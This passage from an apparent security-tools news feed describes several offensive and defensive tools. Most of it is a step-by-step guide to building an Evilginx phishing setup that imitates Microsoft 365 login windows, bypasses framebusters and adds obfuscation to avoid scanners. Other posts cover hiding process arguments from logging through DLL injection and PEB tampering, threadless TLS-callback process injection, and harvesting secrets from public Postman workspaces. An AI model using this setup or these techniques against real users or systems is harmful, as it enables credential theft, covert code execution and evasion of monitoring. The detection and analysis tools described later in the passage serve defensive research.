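    length = int.from_bytes(read(params + 0x70, 2), "little")       # UNICODE_STRING.Length
    buf_ptr = int.from_bytes(read(params + 0x70 + 8, 8), "little")  # UNICODE_STRING.Buffer
    return read(buf_ptr, length).decode("utf-16-le")

Tools that display process arguments read this same structure, which is why overwriting it right after process creation hides the real arguments from them.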

Demo: Running Mimikatz and passing it the arguments:

Process Hacker View:


All the arguments are hidden dynamically

Process Monitor View:


Technical Implementation

  1. Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)

  2. Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.

  3. Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary.

  4. PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.

  5. Execution Redirection: Upon completion of the manipulations, execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that rely on getting the process details from the PEB.

Installation and Usage:

Option 1: Compile NoArgs DLL:

  • You will need Microsoft Detours installed.

  • Compile the DLL.

  • Inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically.

Option 2: Download the compiled executable (ready-to-go) from the releases page.

References:

  • https://en.wikipedia.org/wiki/Microsoft_Detours
  • https://github.com/microsoft/Detours
  • https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
  • https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++


Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

By: Zion3R


A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. ▶ Watch Video


Video Tutorial: 👇

Disclaimer

This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

Backstory - The Why

Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

The What

A Browser In The Browser (BITB) without any iframes! As simple as that.

Meaning that we can now use BITB with Evilginx on websites like Microsoft.

Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

The How

Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.

Instructions

Video Tutorial


Local VM:

Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

Update and Upgrade system packages:

sudo apt update && sudo apt upgrade -y

Evilginx Setup:

Optional:

Create a new evilginx user, and add user to sudo group:

sudo su

adduser evilginx

usermod -aG sudo evilginx

Test that evilginx user is in sudo group:

su - evilginx

sudo ls -la /root

Navigate to the user's home dir:

cd /home/evilginx

(You can do everything as sudo user as well since we're running everything locally)

Setting Up Evilginx

Download and build Evilginx: Official Docs

Copy Evilginx files to /home/evilginx

Install Go: Official Docs

wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile

ADD: export PATH=$PATH:/usr/local/go/bin

source ~/.profile

Check:

go version

Install make:

sudo apt install make

Build Evilginx:

cd /home/evilginx/evilginx2
make

Create a new directory for our evilginx build along with phishlets and redirectors:

mkdir /home/evilginx/evilginx

Copy build, phishlets, and redirectors:

cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

Ubuntu firewall quick fix (thanks to @kgretzky)

sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get a "Failed to start nameserver on: :53" error, try modifying this file:

sudo nano /etc/systemd/resolved.conf

Edit/add the DNSStubListener setting and set it to no: DNSStubListener=no

then

sudo systemctl restart systemd-resolved

Modify Evilginx Configurations:

Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

nano ~/.evilginx/config.json

CHANGE https_port from 443 to 8443

Install Apache2 and Enable Mods:

Install Apache2:

sudo apt install apache2 -y

Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat

Start and enable Apache:

sudo systemctl start apache2
sudo systemctl enable apache2

Check that Apache and VM networking work by visiting the VM's IP from a browser on the host machine.

Clone this Repo:

Install git if not already available:

sudo apt -y install git

Clone this repo:

git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb

Apache Custom Pages:

Make directories for the pages we will be serving:

  • home: (Optional) Homepage (at base domain)
  • primary: Landing page (background)
  • secondary: BITB Window (foreground)
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary

Copy the directories for each page:


sudo cp -r ./pages/home/ /var/www/

sudo cp -r ./pages/primary/ /var/www/

sudo cp -r ./pages/secondary/ /var/www/

Optional: Remove the default Apache page (not used):

sudo rm -r /var/www/html/

Copy the O365 phishlet to phishlets directory:

sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

Self-signed SSL certificates:

Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

Create dir and parents if they do not exist:

sudo mkdir -p /etc/ssl/localcerts/fake.com/

Generate the SSL certs using the OpenSSL config file:

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf

Modify private key permissions:

sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

Apache Custom Configs:

Copy custom substitution files (the core of our approach):

sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs, for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode, and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of the two, or implement your own logic for automatic switching.

Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (There are 2 references in each file.)

# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf

To make it easier, I included both versions as separate files for this next step.

Windows/Chrome BITB:

sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Mac/Chrome BITB:

sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Test Apache configs to ensure there are no errors:

sudo apache2ctl configtest

Restart Apache to apply changes:

sudo systemctl restart apache2

Modifying Hosts:

Get the IP of the VM using ifconfig and note it somewhere for the next step.

We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

On Windows:

Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:

C:\Windows\System32\drivers\etc\

Change the file types (bottom-right) to "All files".

Double-click the file named hosts

On Mac:

Open a terminal and run the following:

sudo nano /private/etc/hosts

Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section

Save and exit.

Now restart your browser before moving to the next step.

Note: On Mac, use the following command to flush the DNS cache:

sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the 127.0.0.1 with the actual local IP of your VM.

Trusting the Self-Signed SSL Certs:

Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

For this step, it's easier to follow the video instructions, but here is the gist anyway.

Open https://fake.com/ in your Chrome browser.

Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate. IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > Install for current user. Do NOT select automatic; instead, place the certificate in a specific store: select "Trusted Root Certification Authorities".

On Mac: to install for the current user only, select "Keychain: login" AND click "View Certificates" > Details > Trust > Always Trust.

Now RESTART your Browser

You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

Running Evilginx:

At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

Optional: Install tmux (to keep evilginx running even if the terminal session is closed; mainly useful when running on a remote VM):

sudo apt install tmux -y

Start Evilginx in developer mode (using tmux to avoid losing the session):

tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer

(To re-attach to the tmux session use tmux attach-session -t evilginx)

Evilginx Config:

config domain fake.com
config ipv4 127.0.0.1

IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

blacklist noadd

Setup Phishlet and Lure:

phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0

Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

Useful Resources

Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

TODO

  • Create script(s) to automate most of the steps


Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking

By: Zion3R


This tool compilation is carefully crafted to be useful both to beginners and to veterans of the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.

It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.


Advantages

To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:

  1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

  2. The pack is integrated with a Universal Updater made by us from scratch. Thanks to that, we get to maintain all the tools in an automated fashion.

  3. It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to integrate the tools you use into the updater, and then add the links for your tools to bin\sendto\sendto, so they appear in the context menus.

  4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.

Installation

  1. You can simply download the stable versions from the release section, where you can also find the installer.

  2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
    You will find the binary in the folder bin\updater\updater.exe.

Tool set

This toolkit is composed of 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from its original/official website, but we still recommend using them with caution, especially those tools whose official pages are forum threads. Always exercise common sense.
You can check the complete list of tools here.

About contributions

Pull Requests are welcome. If you want to propose big changes, you should first create an Issue about it, so we can all analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z



Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

By: Zion3R


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proofs of concept, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration of recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false positives that still provided offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams

Installation

python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can be used to conduct nearly complete reviews of public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments, which can be performed on collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

Using as a library

Searching

# Import path assumed to match the class name used below; adjust if needed.
from porchpirate import porchpirate

p = porchpirate()
print(p.search('coca-cola.com'))

Get Workspace Collections

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Dumping a Workspace

import json

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
        request_data = p.request(r['id'])
        print(request_data)

Grabbing a Workspace's Globals

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py


APKDeepLens - Android Security Insights In Full Spectrum

By: Zion3R


APKDeepLens is a Python-based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.


Features

APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:

  • APK Analysis -> Scans Android application package (APK) files for security vulnerabilities.
  • OWASP Coverage -> Covers OWASP Top 10 vulnerabilities to ensure a comprehensive security assessment.
  • Advanced Detection -> Utilizes custom Python code for APK file analysis and vulnerability detection.
  • Sensitive Information Extraction -> Identifies potential security risks by extracting sensitive information from APK files, such as insecure authentication/authorization keys and insecure request protocols.
  • In-depth Analysis -> Detects insecure data storage practices, including data related to the SD card, and highlights the use of insecure request protocols in the code.
  • Intent Filter Exploits -> Pinpoint vulnerabilities by analyzing intent filters extracted from AndroidManifest.xml.
  • Local File Vulnerability Detection -> Safeguard your app by identifying potential mishandlings related to local file operations.
  • Report Generation -> Generates detailed and easy-to-understand reports for each scanned APK, providing actionable insights for developers.
  • CI/CD Integration -> Designed for easy integration into CI/CD pipelines, enabling automated security testing in development workflows.
  • User-Friendly Interface -> Color-coded terminal outputs make it easy to distinguish between different types of findings.

Installation

To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:

For Linux

git clone https://github.com/d78ui98/APKDeepLens
cd APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python APKDeepLens.py --help

For Windows

git clone https://github.com/d78ui98/APKDeepLens
cd APKDeepLens
python3 -m venv venv
.\venv\Scripts\activate
pip install -r .\requirements.txt
python APKDeepLens.py --help

Usage

To simply scan an APK, use the command below, specifying the APK file with the -apk argument. Once the scan is complete, a detailed report will be displayed in the console.

python3 APKDeepLens.py -apk file.apk

If you've already extracted the source code and want to provide its path for a faster scan, you can use the command below, specifying the Android application's source code with the -source parameter.

python3 APKDeepLens.py -apk file.apk -source <source-code-path>

To generate detailed PDF and HTML reports after the scan, pass the -report argument as shown below.

python3 APKDeepLens.py -apk file.apk -report

Contributing

We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.

For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)




RemoteTLSCallbackInjection - Utilizing TLS Callbacks To Execute A Payload Without Spawning Any Threads In A Remote Process

By: Zion3R


This method utilizes TLS callbacks to execute a payload without spawning any threads in a remote process. This method is inspired by Threadless Injection, as RemoteTLSCallbackInjection does not invoke any API calls to trigger the injected payload.

Quick Links

Maldev Academy Home

Maldev Academy Syllabus

Related Maldev Academy Modules

New Module 34: TLS Callbacks For Anti-Debugging

New Module 35: Threadless Injection



Implementation Steps

The PoC follows these steps:

  1. Create a suspended process using the CreateProcessViaWinAPIsW function (i.e. RuntimeBroker.exe).
  2. Fetch the remote process image base address followed by reading the process's PE headers.
  3. Fetch an address to a TLS callback function.
  4. Patch a fixed shellcode (i.e. g_FixedShellcode) with runtime-retrieved values. This shellcode is responsible for restoring both the original bytes and the memory permissions of the TLS callback function's address.
  5. Inject both shellcodes: g_FixedShellcode and the main payload.
  6. Patch the TLS callback function's address and replace it with the address of our injected payload.
  7. Resume process.

The g_FixedShellcode shellcode will then make sure that the main payload executes only once, by restoring the original TLS callback address before calling the main payload. A TLS callback can execute multiple times across the lifespan of a process, so it is important to control the number of times the payload is triggered by restoring the original code-path execution to the original TLS callback function.
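
To see the structure this technique abuses, you can enumerate a binary's TLS callback array statically. A minimal sketch using the third-party pefile package follows (not part of this PoC; target.exe is a placeholder path):

import pefile  # pip install pefile

pe = pefile.PE("target.exe")  # placeholder: any PE to inspect
if hasattr(pe, "DIRECTORY_ENTRY_TLS"):
    base = pe.OPTIONAL_HEADER.ImageBase
    rva = pe.DIRECTORY_ENTRY_TLS.struct.AddressOfCallBacks - base
    is64 = pe.OPTIONAL_HEADER.Magic == 0x20B  # PE32+
    read_ptr = pe.get_qword_at_rva if is64 else pe.get_dword_at_rva
    step = 8 if is64 else 4
    callbacks = []
    # The callback array is a NULL-terminated list of function pointers.
    while (ptr := read_ptr(rva)) not in (0, None):
        callbacks.append(ptr)
        rva += step
    print("TLS callbacks:", [hex(c) for c in callbacks])
else:
    print("no TLS directory")

Step 6 of the PoC effectively swaps one of these pointers for the injected payload's address.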

Demo

The following image shows our implementation, RemoteTLSCallbackInjection.exe, spawning a cmd.exe as its main payload.



Sicat - The Useful Exploit Finder

By: Zion3R

Introduction

SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploits. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.


SiCat Resources

Installation

git clone https://github.com/justakazh/sicat.git && cd sicat

pip install -r requirements.txt

Usage


~$ python sicat.py --help

Command Line Options:

Command Description
-h Show help message and exit
-k KEYWORD Search by keyword
-kv KEYWORD_VERSION Search by keyword and version
-nm Identify via nmap output
--nvd Use NVD as info source
--packetstorm Use PacketStorm as info source
--exploitdb Use ExploitDB as info source
--exploitalert Use ExploitAlert as info source
--msfmodule Use Metasploit as info source
-o OUTPUT Path to save output to
-ot OUTPUT_TYPE Output file type: json or html

Examples

From keyword


python sicat.py -k telerik --exploitdb --msfmodule

From nmap output


nmap --open -sV localhost -oX nmap_out.xml
python sicat.py -nm nmap_out.xml --packetstorm

To-do

  • [ ] Input from nmap results via a pipeline
  • [ ] Nmap multiple host support
  • [ ] Search NSE Script
  • [ ] Search by PORT

Contribution

I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.



CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

By: Zion3R


Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


Notes

To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

Required Packages

pip3 install -r requirements.txt

Cloning cloudgrep locally

To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

chmod +x clone.sh
./clone.sh

Input

This tool offers a CLI (Command Line Interface). As such, here we review its use:

Example 1 - Running the tool with default queries file

Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

Note

Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

{
  "AWS": [
    {
      "bucket": "cloudtrail-logs-00000000-ffffff",
      "prefix": [
        "testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
        "testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
      ]
    },
    {
      "bucket": "aws-kosova-us-east-1-00000000"
    }
  ],
  "AZURE": [
    {
      "accountname": "logs",
      "container": [
        "cloudgrappler"
      ]
    }
  ]
}

Run command

python3 main.py

Example 2 - Permiso Intel Use Case

python3 main.py -p

[+] Running GetFileDownloadUrls.*secrets_ for AWS 
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers. This however may be a part of your normal business use case.

Example 3 - Generate report

python3 main.py -p -jo

reports
└── json
    ├── AWS
    │   └── 2024-03-04 01:01 AM
    │       └── cloudtrail-logs-00000000-ffffff--
    │           └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    │               └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
        └── 2024-03-04 01:01 AM
            └── logs
                └── cloudgrappler
                    └── okta_key.json

Example 4 - Filtering logs based on date or time

python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

Example 5 - Manually adding queries and data source types

python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

Example 6 - Running the tool with your own queries file

python3 main.py -f new_file.json
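
The schema of a custom queries file is not reproduced here. Judging from Example 5 above (regex query strings plus a source of AWS, AZURE, or the * wildcard), a hypothetical new_file.json might be generated like this; check the shipped queries.json for the authoritative field names:

import json

# Hypothetical schema guessed from the -q/-s flags above; verify against
# the default queries.json before relying on these field names.
queries = [
    {"query": "GetFileDownloadUrls.*secret", "source": "*"},
    {"query": "UpdateAccessKey", "source": "AWS"},
]

with open("new_file.json", "w") as f:
    json.dump(queries, f, indent=2)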

Running in your Cloud and Authentication cloudgrep

AWS

Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.

Azure

The simplest way to authenticate with Azure is to first run:

az login

This will open a browser window and prompt you to login to Azure.



GDBFuzz - Fuzzing Embedded Systems Using Hardware Breakpoints

By: Zion3R


This is the companion code for the paper 'Fuzzing Embedded Systems using Debugger Interfaces'. A preprint of the paper can be found at https://publications.cispa.saarland/3950/. The code allows users to reproduce and extend the results reported in the paper. Please cite the above paper when reporting, reproducing, or extending the results.


Folder structure

.
├── benchmark          # Scripts to build Google's fuzzer test suite and run experiments
├── dependencies       # Contains a Makefile to install dependencies for GDBFuzz
├── evaluation         # Raw experiment data, presented in the paper
├── example_firmware   # Embedded example applications, used for the evaluation
├── example_programs   # Contains a compiled example program and configs to test GDBFuzz
├── src                # Contains the implementation of GDBFuzz
├── Dockerfile         # For creating a Docker image with all GDBFuzz dependencies installed
├── LICENSE            # License
├── Makefile           # Makefile for creating the Docker image or installing GDBFuzz locally
└── README.md          # This README file

Purpose of the project

The idea of GDBFuzz is to leverage hardware breakpoints from microcontrollers as feedback for coverage-guided fuzzing. Therefore, GDB is used as a generic interface to enable broad applicability. For binary analysis of the firmware, Ghidra is used. The code contains a benchmark setup for evaluating the method. Additionally, example firmware files are included.

Getting Started

GDBFuzz enables coverage-guided fuzzing for embedded systems, but - for evaluation purposes - can also fuzz arbitrary user applications. For fuzzing on microcontrollers we recommend a local installation of GDBFuzz to be able to send fuzz data to the device under test flawlessly.

Install local

GDBFuzz has been tested on Ubuntu 20.04 LTS and Raspberry Pi OS 32-bit. Prerequisites are Java and Python 3. First, create a new virtual environment and install all dependencies.

virtualenv .venv
source .venv/bin/activate
make
chmod a+x ./src/GDBFuzz/main.py

Run locally on an example program

GDBFuzz reads settings from a config file with the following keys.

[SUT]
# Path to the binary file of the SUT.
# This can, for example, be an .elf file or a .bin file.
binary_file_path = <path>

# Address of the root node of the CFG.
# Breakpoints are placed at nodes of this CFG.
# e.g. 'LLVMFuzzerTestOneInput' or 'main'
entrypoint = <entrypoint>

# Number of inputs that must be executed without a breakpoint hit until
# breakpoints are rotated.
until_rotate_breakpoints = <number>


# Maximum number of breakpoints that can be placed at any given time.
max_breakpoints = <number>

# Blacklist functions that shall be ignored.
# ignore_functions is a space separated list of function names e.g. 'malloc free'.
ignore_functions = <space separated list>

# One of {Hardware, QEMU, SUTRunsOnHost}
# Hardware: An external component starts a gdb server and GDBFuzz can connect to this gdb server.
# QEMU: GDBFuzz starts QEMU. QEMU emulates binary_file_path and starts gdbserver.
# SUTRunsOnHost: GDBFuzz starts the target program within GDB.
target_mode = <mode>

# Set this to False if you want to start ghidra, analyze the SUT,
# and start the ghidra bridge server manually.
start_ghidra = True


# Space separated list of addresses where software breakpoints (for error
# handling code) are set. Execution of those is considered a crash.
